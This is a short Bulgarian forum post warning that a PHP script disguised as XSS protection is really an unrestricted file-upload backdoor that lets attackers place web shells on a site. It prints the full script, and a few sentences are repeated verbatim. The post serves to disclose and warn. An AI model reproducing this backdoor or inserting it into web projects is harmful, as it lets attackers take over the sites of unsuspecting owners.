Искам да сложа един скрип, който можеби доста от вас използват, мислейки го за защита.
Всъщност това е Ъплоад скрипт и могат да ви слагат шелове в уебовете.
Най вече беше в моя уеб.
Тва е най простия начин по който можете да бъдете хакнати, не е голямо чудо,
но все пак ще изгубите повечко време на човека решил да ви хаква.
Надявам се да съм бил полезен.
Всъщност това е Ъплоад скрипт и могат да ви слагат шелове в уебовете.
Най вече беше в моя уеб.
Тва е най простия начин по който можете да бъдете хакнати, не е голямо чудо,
но все пак ще изгубите повечко време на човека решил да ви хаква.
Code:
<?php
$xss_protect = "./";
if (isset($_POST["xss_security"])) {
$xss = $_FILES['file'];
foreach ($xss['name'] as $idx=>$file){
$xss_name = $xss['name'][$idx];
$xss_name = strtolower($xss_name);
$xss_name = preg_replace('/[^a-z0-9_.]/i', '', $xss_name);
$xss_size= intval($xss['size'][$idx]);
$xss_file = $xss['tmp_name'][$idx];
$copy = copy($xss_file,$xss_protect.$xss_name);
if($copy) { echo ("Successfully!<br />\n"); }
if(!$copy && $file_name != '') { echo ("<b>Error!<br />\n"); }
}echo ("<a href='$xss_name'>Continue...</a>");}
?>
Last edited: